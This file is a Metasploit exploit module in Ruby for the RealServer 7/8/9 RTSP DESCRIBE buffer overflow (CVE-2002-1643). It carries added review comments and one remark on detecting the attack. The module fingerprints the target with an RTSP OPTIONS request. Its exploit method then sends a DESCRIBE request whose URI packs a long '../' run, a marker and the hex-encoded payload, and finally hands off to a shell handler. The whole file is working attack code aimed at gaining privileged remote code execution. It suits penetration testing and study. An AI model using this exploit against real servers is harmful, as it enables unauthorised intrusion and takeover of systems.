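##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# RealServer 7/8/9 RTSP DESCRIBE buffer overflow module (CVE-2002-1643).
#
# Two entry points are exposed to the framework: +check+ probes the service
# with an RTSP OPTIONS request, and +exploit+ sends the crafted DESCRIBE
# request and then hands control to the payload handler.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata overrides supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'RealServer Describe Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in RealServer 7/8/9
          and was based on Johnny Cyberpunk's THCrealbad exploit. This
          code should reliably exploit Linux, BSD, and Windows-based
          servers.
        },
        'Author' => 'hdm',
        'References' => [
          ['CVE', '2002-1643'],
          ['OSVDB', '4468']
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 2000,
          # Bytes the payload encoder must avoid (kept exactly as the original module lists them).
          'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
        },
        'Platform' => %w[bsd linux win],
        'Targets' => [
          [
            'Universal',
            {
              'Platform' => %w[bsd linux win]
            }
          ]
        ],
        'DisclosureDate' => '2002-12-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Probes the target with an RTSP OPTIONS request.
  #
  # Only the presence of a Server header in the reply is tested, so a hit is
  # reported as Detected rather than Vulnerable: this does not confirm that an
  # affected RealServer version is running.
  #
  # @return [Exploit::CheckCode] Detected when an RTSP Server header is seen, Safe otherwise
  def check
    res = send_request_raw(
      {
        'method' => 'OPTIONS',
        'proto' => 'RTSP',
        'version' => '1.0',
        'uri' => '/'
      }, 5
    )

    # The original assigned this result to an unused local. The call is kept
    # for any reporting it performs on the captured response.
    # NOTE(review): confirm the fingerprint call is still wanted here.
    http_fingerprint({ :response => res })

    if res && res['Server']
      vprint_status("Found RTSP: #{res['Server']}")
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Sends the crafted RTSP DESCRIBE request and starts the payload handler.
  #
  # The request URI is built from a 560-deep "../" run, a four-byte marker,
  # the percent-hex-encoded payload and a ".smi" suffix, exactly as in the
  # original module. From a detection standpoint, an RTSP DESCRIBE whose URI
  # has this length and shape is distinctive enough to alert on.
  #
  # @return [void]
  def exploit
    print_status("RealServer universal exploit launched against #{rhost}")
    print_status("Kill the master rmserver pid to prevent shell disconnect")

    encoded = Rex::Text.to_hex(payload.encoded, "%")

    # The reply was never inspected by the original code; the result is
    # intentionally discarded rather than bound to an unused local.
    send_request_raw({
      'method' => 'DESCRIBE',
      'proto' => 'RTSP',
      'version' => '1.0',
      'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
    }, 5)

    handler
  end
end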